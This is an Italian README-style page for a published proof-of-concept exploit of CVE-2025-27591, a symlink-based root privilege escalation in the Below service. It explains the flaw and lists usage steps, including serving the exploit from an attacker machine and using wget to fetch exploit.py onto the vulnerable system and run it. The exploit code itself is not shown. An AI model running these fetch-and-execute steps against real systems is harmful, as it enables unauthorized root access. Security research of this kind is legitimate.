
CVE-2025-27591 è una vulnerabilità di escalation dei privilegi che ha interessato il servizio Below prima della versione 0.9.0
CVE-2025-27591 è una vulnerabilità di escalation dei privilegi che ha interessato il servizio Below prima della versione 0.9.0. Il problema derivava dalla creazione di una directory scrivibile da tutti gli utenti in /var/log/below. Un attaccante potrebbe sfruttare questa vulnerabilità manipolando i symlink all'interno di questa directory e potenzialmente ottenere privilegi di root, rendendola una preoccupazione di sicurezza significativa per utenti locali non privilegiati.
Questa Proof-of-Concept è stata scritta solo per scopi educativi e di ricerca.
Al momento della scrittura, non esisteva alcun PoC pubblicamente disponibile per questa vulnerabilità nella comunità. Pertanto, ho deciso di condividere responsabilmente questa implementazione per colmare questa lacuna, contribuire all'ecosistema della ricerca sulla sicurezza e sensibilizzare sulla natura critica dei file system insicuri.
Dalla macchina dell'attaccante:
1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git
2-cd CVE-2025-27591-PoC
3-python3 -m http.server 80
Dal sistema vulnerabile:
1- wget http:///exploit.py
2-python exploit.py
https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3